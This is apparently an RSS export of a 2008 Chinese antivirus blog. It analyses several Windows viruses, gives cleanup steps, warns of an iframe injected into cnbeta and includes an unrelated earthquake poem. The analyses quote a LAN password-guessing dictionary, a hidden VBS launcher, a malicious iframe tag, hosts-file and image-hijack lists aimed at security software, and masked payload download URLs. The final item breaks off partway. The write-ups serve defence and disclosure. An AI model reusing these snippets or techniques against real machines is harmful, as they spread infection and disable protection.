日期：2008/06/19&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  (转载请保留此声明)</font> </font></p>
<p>这是一个具有多种传播功能和反杀毒软件功能的下载者病毒，传播方式新颖独特，需要严密防范！</p>
<p>下面是该病毒的详细分析报告：</p>
<p>病毒初始化过程：<br>
1.创建一个互斥量：中华吸血鬼2.2<br>
2.删除SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}</p>
<p>3.释放如下副本或文件：<br>
%systemroot%\Tasks\绿化.bat<br>
%systemroot%\Tasks\csrss.exe<br>
%systemroot%\Tasks\wsock32.dll</p>
<p>4.之后创建很多线程，执行多种病毒功能：</p>
<p>(1)通过GetWindowTextA函数获得窗口标题，并比较是否含有如下字样<br>
worm<br>
卡巴斯基<br>
江民<br>
金山<br>
Anti<br>
anti<br>
Virus<br>
virus<br>
Firewall<br>
Mcafee<br>
查杀<br>
主动防御<br>
微点<br>
系统保护<br>
主 动<br>
主动<br>
杀马<br>
木马<br>
上报<br>
举 报<br>
举报<br>
进 程<br>
进程<br>
系统安全<br>
Process<br>
NOD32<br>
专 杀<br>
专 杀<br>
专杀<br>
安全卫士<br>
绿鹰<br>
...</p>
<p>如果含有则使用PostMessage函数会发送消息给他们：<br>
首先发送一个WM_Destroy，之后发送两个WM_Close 最后发一个WM_Destroy 的消息。并把窗口标题名保存下来。<br>
之后会调用Messageboxa函数弹出一个标题为&quot;Windows盗版验证为&quot;的窗口 并显示如下字样&ldquo;安全提示：您正在使用的(刚刚获得的窗口标题名称)是盗版软件，可能您是盗版软件的受害者，为了给合法用户提供保证，我们无法继续给您提供服务，请到指定销售商购买我们的正版软件,如果有任何疑问,请到我们微软主页查看http://www.microsoft.com&rdquo;</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/99db1ed17b85d2c6572c84c5.jpg"></p>
<p>(2) 破坏冰刃<br>
查找类名为Afxcontrolbar423s的窗口 <br>
然后发送WM_Close关闭 再模拟键盘输入按一下回车键</p>
<p>(3) U盘传播功能<br>
检测可移动存储中是否有autorun.inf文件，如果有将其改名<br>
之后向里面写入autorun.inf<br>
创建recycle.{645FF040-5081-101B-9F08-00AA002F954E}文件夹，在该文件夹内写入GHOSTBAK.exe（病毒文件）</p>
<p>(4) 病毒感染统计<br>
搜集被感染主机的mac地址，并把被感染主机的mac地址和感染的病毒版本发送给http://www.*******.cn/tj/ct.asp页面</p>
<p>(5) 修改hosts文件<br>
获得%programfiles%的环境变量，接着查找\\drivers\etc\\hosts文件<br>
写入如下数据：<br>
127.0.0.0 360.qihoo.com<br>
127.0.0.1 qihoo.com<br>
127.0.0.1 www.qihoo.com<br>
127.0.0.1 www.qihoo.cn<br>
127.0.0.1 124.40.51.17<br>
127.0.0.1 58.17.236.92<br>
127.0.0.1 www.kaspersky.com<br>
127.0.0.1 60.210.176.251<br>
127.0.0.1 www.cnnod32.cn<br>
127.0.0.1 www.lanniao.org<br>
127.0.0.1 www.nod32club.com<br>
127.0.0.1 www.dswlab.com<br>
127.0.0.1 bbs.sucop.com<br>
127.0.0.1 www.virustotal.com<br>
127.0.0.1 tool.ikaka.com<br>
127.0.0.1 www.jiangmin.com<br>
127.0.0.1 www.duba.net<br>
127.0.0.1 www.eset.com.cn<br>
127.0.0.1 www.nod32.com<br>
127.0.0.1 shadu.duba.net<br>
127.0.0.1 union.kingsoft.com<br>
127.0.0.1 www.kaspersky.com.cn<br>
127.0.0.1 kaspersky.com.cn<br>
127.0.0.1 virustotal.com<br>
127.0.0.1 www.360.cn<br>
127.0.0.1 www.360safe.cn<br>
127.0.0.1 www.360safe.com<br>
127.0.0.1 www.chinakv.com<br>
127.0.0.1 www.rising.com.cn<br>
127.0.0.1 rising.com.cn<br>
127.0.0.1 dl.jiangmin.com<br>
127.0.0.1 jiangmin.com</p>
<p>每1秒循环一次</p>
<p>(6) 遍历进程，调用Terminate Process函数结束如下进程：<br>
AST.exe<br>
360tray.exe<br>
ast.exe<br>
FWMon.exe</p>
<p>(7) 遍历磁盘文件删除扩展名为gho,GHO,Gho的文件</p>
<p>(8) arp欺骗功能<br>
获取本机IP地址 然后把所在同网段内的.2~.255的机器作为欺骗对象<br>
由系统目录下的arps.com执行%s -idx 0 -ip %s -port 80 -insert \&quot;%s的命令 对局域网内机器进行arp欺骗</p>
<p>(9) 局域网弱密码猜解传播<br>
以administrator为用户名，对局域网中其他机器进行密码猜解。如果成功则复制到对方机器的共享的C,D,E,F盘中，以hackshen.exe<br>
病毒猜解的密码字典如下：<br>
woaini<br>
baby<br>
asdf<br>
NULL<br>
angel<br>
asdfgh<br>
1314520<br>
5201314<br>
caonima<br>
88888<br>
bbbbbb<br>
12345678<br>
memory<br>
abc123<br>
qwerty<br>
123456<br>
password<br>
enter<br>
hack<br>
xpuser<br>
money<br>
yeah<br>
time<br>
game<br>
user<br>
home<br>
alex<br>
guest<br>
admin<br>
test<br>
administrator<br>
movie<br>
root<br>
love</p>
<p>(10)删除HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings键<br>
释放一个hackchen.vbs到%systemroot%\Tasks<br>
hackchen.vbs内容：<br>
On Error Resume Next<br>
Set rs=createObject(&quot;Wscript.shell&quot;)<br>
rs.run &quot;%windir%\Tasks\csrss.exe&quot;,0<br>
并且注册HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK} 指向%systemroot%\Tasks\hackchen.vbs</p>
<p>(11) 病毒自动更新功能。在系统目录下释放meupdate.ini文件，并且和http://www.*******.cn/22.txt做比较，如果不同则下载http://www.*******.cn/server.exe（最新版病毒程序）到c:\_default.pif，并且每600ms执行一次</p>
<p>(12)通过查找%ProgramFiles%的环境变量获得程序文件夹路径，之后查找\\WinRAR\\Rar.exe获得winrar安装路径。<br>
遍历所有分区的.rar,.zip,.tgz,.cab,.tar文件 找到后<br>
后台调用winrar执行&quot;（winrar路径）&quot; -ep a &quot;（找到的rar等文件路径）&quot; %systemroot%\Tasks\绿化.bat 命令<br>
将绿化.bat压缩进压缩包，绿化.bat即为病毒本身，诱使用户点击中毒。</p>
<p>(13)（<strong>此方法十分新颖</strong>）<br>
遍历所有文件夹并且将%systemroot%\Tasks\wsock32.dll 复制到每个文件夹下<br>
当该文件夹下的exe文件的导入表含有wsock32.dll的时候，会首先调用同文件夹下的wsock32.dll，也就是病毒释放的文件。此时会从下载http://www.*******.cn/server.exe（病毒最新版本）并执行！！！</p>
<p>(14) 查找某些类名为#32770的窗口，并且试图发送&quot;我做了快一个月了,每天2个小时有40-50元的收入,你也来看看吧,长期大量招聘网络兼职http://www.*******.cn/jianzhi.htm&quot;的消息给对方(应该是通过QQ之类的聊天工具传播)</p>
<p>(15) 遍历非系统分区的html,aspx，htm等文件 写入iframe代码</p>
<p>(16)下载木马功能<br>
下载http://www.*******.cn/ft/qq.exe<br>
http://www.*******.cn/cj/qq.exe<br>
并执行</p>
<p>清除方法不作赘述，安全模式下清理所有文件夹下的wsock32.dll，<br>
并利用工具清理%systemroot%\Tasks\绿化.bat<br>
%systemroot%\Tasks\csrss.exe<br>
并打开所有压缩包文件 删除里面的绿化.bat。<br>
最后使用杀毒软件全盘杀毒</p>
<p>这也是一个浩大的工程吧~~</p>
<p><strong>综观此病毒有很多新颖之处，首先是在关闭杀软之后弹出窗口，容易给不知情者以迷惑；其次病毒释放的wsock32.dll会使得任意该目录下的exe文件成为下载病毒文件的傀儡；再次由于windows的某些保护，tasks目录下的文件无法直接看到，这又给病毒了一个绝佳的藏身之地；最后，病毒还会将自己压缩到压缩包中，起一个诱惑的名字诱使用户再次中毒。</strong></p>
<p><strong>最近恶性病毒以及木马群肆虐，但此类行为特征新颖的病毒也有所猖獗，望大家做好防范！</strong></p> <a href="http://hi.baidu.com/newcenturysun/blog/item/32391d2490862f2ed40742b7.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/newcenturysun/blog/category/%B2%A1%B6%BE%B7%C0%B7%B6%D3%EB%C9%B1%B3%FD">病毒防范与杀除</a>&nbsp;<a href="http://hi.baidu.com/newcenturysun/blog/item/32391d2490862f2ed40742b7.html#comment">查看评论</a>]]></description>
        <pubDate>2008-06-19  00:33</pubDate>
        <category><![CDATA[病毒防范与杀除]]></category>
        <author><![CDATA[newcenturysun]]></author>
		<guid>http://hi.baidu.com/newcenturysun/blog/item/32391d2490862f2ed40742b7.html</guid>
</item>

<item>
        <title><![CDATA[cnbeta被挂马！]]></title>
        <link><![CDATA[http://hi.baidu.com/newcenturysun/blog/item/dbf4a2fd01bb4d1308244d76.html]]></link>
        <description><![CDATA[
		
		<p>2008年6月8日晚20时左右发现cnbeta被挂马 在网页前面加入了如下代码：</p>
<p>&lt;iframe src=http://www.******.info/hao4.htm width=100 height=1&gt;&lt;/iframe&gt;&nbsp;&nbsp;&nbsp;&nbsp;</p>
<p>请注意，暂时不要访问cnbeta~</p>
<p> </p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/newcenturysun/blog/category/%B2%A1%B6%BE%B7%C0%B7%B6%D3%EB%C9%B1%B3%FD">病毒防范与杀除</a>&nbsp;<a href="http://hi.baidu.com/newcenturysun/blog/item/dbf4a2fd01bb4d1308244d76.html#comment">查看评论</a>]]></description>
        <pubDate>2008-06-08  20:21</pubDate>
        <category><![CDATA[病毒防范与杀除]]></category>
        <author><![CDATA[newcenturysun]]></author>
		<guid>http://hi.baidu.com/newcenturysun/blog/item/dbf4a2fd01bb4d1308244d76.html</guid>
</item>

<item>
        <title><![CDATA[天佑中华！]]></title>
        <link><![CDATA[http://hi.baidu.com/newcenturysun/blog/item/eb0cc9541b63f85dd1090606.html]]></link>
        <description><![CDATA[
		
		<strong>没有声音 <wbr></wbr><wbr></wbr>没有征兆 </strong>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>突然</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>天摇地晃</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>沉默 <wbr></wbr><wbr></wbr>随即是各种奔跑</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>醒悟 <wbr></wbr>原来是地震来临</strong></p>
<p><strong><wbr></wbr></strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>里氏7.8 <wbr></wbr><wbr></wbr><wbr></wbr>远在千里之外的汶川</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>下午2点半 <wbr></wbr>波及前所未有的全国</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>灾难 <wbr></wbr>又是一场灾难</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>救援 <wbr></wbr>又是一次救援</strong></p>
<p><strong><wbr></wbr></strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>汶川告急 <wbr></wbr>四川告急 <wbr></wbr>全国告急</strong></p>
<p><strong><wbr></wbr></strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>几所教学楼 <wbr></wbr>瞬间倒塌 <wbr></wbr>几千学生被埋</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>几处住院部 <wbr></wbr>分崩离析 <wbr></wbr>几百患者撤离</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>无数办公楼 <wbr></wbr>裂缝晃动 <wbr></wbr>上万上班族逃难</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>成都彻夜未免</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>都江堰紧急预警</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>汶川震中迄今无法进入</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>上万死亡</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>三万受伤</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>甘肃 <wbr></wbr>陕西 <wbr></wbr>重庆</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>死亡人数不断攀升</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>德阳 <wbr></wbr>绵阳 <wbr></wbr>北川 <wbr></wbr><wbr></wbr>成都</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>救灾工作立刻开展</strong></p>
<p><strong><wbr></wbr></strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>温家宝赶赴灾区</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><strong>胡锦涛重要指示</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>各省的医疗队随时准备待命</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>我们的子弟兵再一次出发了</strong></p>
<p><strong><wbr></wbr><wbr></wbr></strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>捐款 <wbr></wbr>捐物 <wbr></wbr>抗险 <wbr></wbr>救灾</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><strong>献血车前排起长队</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>绿帐篷里安顿灾民</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>大雨突然下起 <wbr></wbr>余震依然不断 <wbr></wbr><wbr></wbr></strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>灾区人民 <wbr></wbr>你们受苦了</strong></p>
<p><strong><wbr></wbr></strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><strong>人的生命只有一次</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>此刻显得极为珍贵</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>我们知道你们的苦</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>我们也知道你们的伤</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><strong>人死已然无法复生</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>但 <wbr></wbr>但凡能够救活的我们还要继续</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>家园已经一片废墟</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>但 <wbr></wbr>只要万众一心一定能够重建</strong></p>
<p><strong><wbr></wbr></strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>在你们的背后</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><strong>是全国人民的关注和关心</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>在你们的背后</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>是全国人民的援助和救灾</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>空降兵来了</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>救援队来了</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>医疗队来了</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>武警官兵都来了</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>水来了 <wbr></wbr>衣服来了 <wbr></wbr>食物来了 <wbr></wbr>帐篷也来了</strong></p>
<p><strong><wbr></wbr></strong></p>
<p><strong><wbr></wbr></strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>雪灾 <wbr></wbr>我们扛过去了</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>洪水 <wbr></wbr>我们扛过去了</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>这次 <wbr></wbr>我们同样可以扛过去</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>在灾难面前</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>中国人民从来不会低头</strong></p>
<p><strong><wbr></wbr></strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>只要有一线希望</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>我们就要尽百倍努力</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>决不放松</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>只要我们众志成城</strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>中国人民就不可战胜</strong></p>
<p><strong><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr></strong></p>
<p><wbr></wbr><wbr></wbr><wbr></wbr><strong>天佑中华！</strong></p> <a href="http://hi.baidu.com/newcenturysun/blog/item/eb0cc9541b63f85dd1090606.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/newcenturysun/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/newcenturysun/blog/item/eb0cc9541b63f85dd1090606.html#comment">查看评论</a>]]></description>
        <pubDate>2008-05-19  20:03</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[newcenturysun]]></author>
		<guid>http://hi.baidu.com/newcenturysun/blog/item/eb0cc9541b63f85dd1090606.html</guid>
</item>

<item>
        <title><![CDATA[可爱的“小狗上学”病毒]]></title>
        <link><![CDATA[http://hi.baidu.com/newcenturysun/blog/item/3377d8bfba1f680e19d81fb7.html]]></link>
        <description><![CDATA[
		
		<p><font color="#ff0000" size="2">作者：清新阳光&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  ( </font><a href="http://hi.baidu.com/newcenturysun"><font color="#ff0000" size="2">http://hi.baidu.com/newcenturysun</font></a><font size="2"><font color="#ff0000">)<br>
日期：2008/03/29&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  (转载请保留此声明)</font> </font></p>
<p>样本来自网友qcqyt，在此表示感谢</p>
<p>这是一个使用VB编写的病毒。可以通过U盘等移动存储传播。修改可执行文件图标，映像劫持杀毒软件...</p>
<p>1.病毒启动后，释放如下文件或者副本<br>
%systemroot%\system32\soleboy.exe<br>
%systemroot%\system32\soleboy.txt</p>
<p>各个分区根目录下生成soleboy.exe和autorun.inf达到随移动存储传播的目的。</p>
<p>2.试图结束一些安全工具的进程<br>
比如procexp.exe<br>
U盘病毒免疫器<br>
avgnt.exe<br>
Psview.exe<br>
PowerRmv.exe<br>
ToolsLoader.exe<br>
FrameworkService.exe<br>
...</p>
<p>3.映像劫持如下杀毒软件和安全工具：<br>
360Safe.exe<br>
360tray.exe<br>
ACAAS.exe<br>
ACAEGMgr.exe<br>
ACAIS.exe<br>
ACALS.exe<br>
ACASP.exe<br>
ACenter.exe<br>
AFMain.exe<br>
AGB6.EXE<br>
AGBKrnl.exe<br>
AhnSD.exe<br>
AhnSDsv.exe<br>
AluSchedulerSvc.exe<br>
AScheduleService.exe<br>
AST.exe<br>
avcenter.exe<br>
avgnt.exe<br>
avguard.exe<br>
CCenter.exe<br>
ccSvcHst.exe<br>
FilMsg.exe<br>
FrameworkService.exe<br>
KASMain.exe<br>
KAV32.exe<br>
KVIETools.exe<br>
kvsrvxp.exe<br>
KWatch.exe<br>
mcconsol.exe<br>
Mcshield.exe<br>
MPMain.exe<br>
MPMon.exe<br>
MPSVC.exe<br>
MPSVC1.exe<br>
MPSVC2.exe<br>
MSProxy.ahn<br>
naPrdMgr.exe<br>
nod32krn.exe<br>
nod32kui.exe<br>
PCCIOMON.EXE<br>
PCCVScan.exe<br>
PCMAIN.EXE<br>
PowerRmv.exe<br>
psview.exe<br>
Rav.exe<br>
RavMonD.exe<br>
sched.exe<br>
sessmgr.exe<br>
shstat.exe<br>
SnipeSword.exe<br>
TRIALMSG.exe<br>
Twister.exe<br>
vcn.exe<br>
vcs.exe<br>
vcw.exe<br>
VsTskMgr.exe<br>
劫持到%systemroot%\system32\soleboy.exe</p>
<p>4.添加注册表启动项目HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\soleboy: &quot;%systemroot%\system32\soleboy.exe&quot;达到开机启动自身的目的</p>
<p>5.修改com和exe文件的文件关联指向soleboy.exe<br>
HKLM\SOFTWARE\Classes\comfile\shell\open\command\: &quot;soleboy.exe &quot;%1&quot; %*&quot;<br>
HKLM\SOFTWARE\Classes\exefile\shell\open\command\: &quot;soleboy.exe &quot;%1&quot; %*&quot;</p>
<p>6.修改exe的图标关联 指向soleboy.exe，使得所有exe图标变成小狗图案。<br>
HKEY_CLASSES_ROOT\exefile\DefaultIcon: &quot;soleboy.exe&quot;</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/142c678d3e15bd03b31bbac0.jpg"></p>
<p>7.查找带有如下字样的窗口，找到后利用sendmessage函数发送WM_CLOSE命令关闭窗口<br>
瑞星反病毒资讯网 [信息安全 源自瑞星] - Windows Internet Explorer<br>
Windows 任务管理器<br>
注册表编辑器<br>
江民进程查看器<br>
欢迎光临江民科技[网络安全，选择江民] - Windows Internet Explorer<br>
金山毒霸信息安全网－免费下载杀毒软件 - Windows Internet Explorer<br>
卡巴斯基实验室: 反病毒软件,反间谍程序,垃圾邮件过滤 - Windows Internet Explorer<br>
360安全卫士－Windows Internet Explorer<br>
防病毒、反间谍软件、端点安全、备份、存储和遵从解决方案－赛门铁克公司－Windows Internet Explorer<br>
大型企业 - 趋势科技 中国 - Windows Internet Explorer<br>
东方微点 - Windows Internet Explorer<br>
...</p>
<p>8 删除%systemroot%\system32\taskkill.exe</p>
<p>9.作者在soleboy.txt中写道：</p>
<p>I want to go to university.<br>
I think Jiangmin Antivirus Software is the best security software!<br>
Don't worry ,I won't destroy your data.</p>
<p>解决方法：<br>
下载sreng，Icesword<br>
sreng:http://www.skycn.com/soft/23312.html#download<br>
Icesword:http://mail.ustc.edu.cn/~jfpan/download/IceSword122cn.zip</p>
<p>已经安装winrar的请打开winrar的安装路径 找到winrar.exe 把他改名为winrar.bat双击运行</p>
<p>然后单击winrar菜单栏&ldquo;文件&rdquo;按钮 打开压缩文件</p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/07f2f3118a7bf2d7a7ef3fb1.jpg"></p>
<p>分别解压sreng和Icesword</p>
<p>1.把Icesword.exe改名为1.bat运行<br>
打开Icesword－进程<br>
结束soleboy.exe进程</p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/556a57a90d4f4bed1e17a2cf.jpg"></p>
<p>2.同样方法解压sreng<br>
把srengps.exe改名为 2.bat运行<br>
启动项目 注册表 <br>
删除如下项目<br>
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]<br>
&lt;soleboy&gt;&lt;C:\WINDOWS\system32\soleboy.exe&gt; [Soleboy]<br>
并删除所有红色的IFEO项目</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/d261311fdd5155d9a78669b8.jpg"></p>
<p>系统修复 文件关联 点击&ldquo;修复&rdquo;按钮</p>
<p>3.开始 运行 输入regedit<br>
展开HKEY_CLASSES_ROOT\exefile\DefaultIcon 修改该项数据为&quot;%1&quot; （不包括引号）</p>
</div>
</div> <a href="http://hi.baidu.com/newcenturysun/blog/item/3377d8bfba1f680e19d81fb7.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/newcenturysun/blog/category/%B2%A1%B6%BE%B7%C0%B7%B6%D3%EB%C9%B1%B3%FD">病毒防范与杀除</a>&nbsp;<a href="http://hi.baidu.com/newcenturysun/blog/item/3377d8bfba1f680e19d81fb7.html#comment">查看评论</a>]]></description>
        <pubDate>2008-03-29  16:18</pubDate>
        <category><![CDATA[病毒防范与杀除]]></category>
        <author><![CDATA[newcenturysun]]></author>
		<guid>http://hi.baidu.com/newcenturysun/blog/item/3377d8bfba1f680e19d81fb7.html</guid>
</item>

<item>
        <title><![CDATA[警惕新版“水牛”病毒！]]></title>
        <link><![CDATA[http://hi.baidu.com/newcenturysun/blog/item/2f3e668bbc765916c8fc7aff.html]]></link>
        <description><![CDATA[
		
		<p><font color="#ff0000" size="2">作者：清新阳光&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  ( </font><a href="http://hi.baidu.com/newcenturysun"><font color="#ff0000" size="2">http://hi.baidu.com/newcenturysun</font></a><font size="2"><font color="#ff0000">)<br>
日期：2008/03/25&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  (转载请保留此声明)</font> </font></p>
<p>这是之前流行的&ldquo;水牛&rdquo;病毒的最新变种，新变种的技术较以前有了较大进步，具有恢复SSDT，挂系统钩子隐藏自身文件和注册表项目等多种新功能，普通用户难以捕捉到他的行踪...</p>
<p>下面是病毒的简单分析：<br>
File: nwizs.exe<br>
Size: 56905 bytes<br>
Modified: 2008年3月19日, 11:42:20<br>
MD5: 9611CE48C43E845D0424FDDB45ADF29F<br>
SHA1: 24E5A9A0558F95349D64FB6B985043B9B3382140<br>
CRC32: F72FC4BC</p>
<p>1.病毒初始化,释放驱动文件覆盖系统中的%systemroot%\system32\drivers\Beep.sys，该驱动用于恢复SSDT。</p>
<p>2.释放如下文件或者副本<br>
%systemroot%\system32\Hook_nwizs.dll<br>
%systemroot%\system32\nwizs.exe<br>
各个分区下释放nwizs.exe 和autorun.inf文件</p>
<p>其中Hook_nwizs.dll挂钩FindNextFile，NtEnumerateValueKey等函数隐藏自身文件和注册表启动项目，使得在资源管理器和注册表编辑器中无法看到其行踪（包括sreng）</p>
<p>之后会启动两个空壳的svchost.exe 并使用Writeprocessmemory 函数将病毒代码写入进去。且两个svchost.exe互相守护。</p>
<p>3.添加启动项目开机启动自身</p>
<p>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run<br>
&lt;nwizs&gt;&lt;C:\WINDOWS\system32\nwizs.exe&gt;</p>
<p>4.添加IFEO映像劫持很多安全软件，诸如：<br>
360rpt.exe<br>
360Safe.exe<br>
360tray.exe<br>
adam.exe<br>
AgentSvr.exe<br>
AppSvc32.exe<br>
autoruns.exe<br>
avgrssvc.exe<br>
avp.exe<br>
avp.com<br>
CCenter.exe<br>
ccSvcHst.exe...</p>
<p><br>
5.删除如下注册表键破坏安全模式<br>
SYSTEM\ControlSet001\Control\SafeBoot\Minimal\<br>
SYSTEM\ControlSet001\Control\SafeBoot\Network\<br>
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\<br>
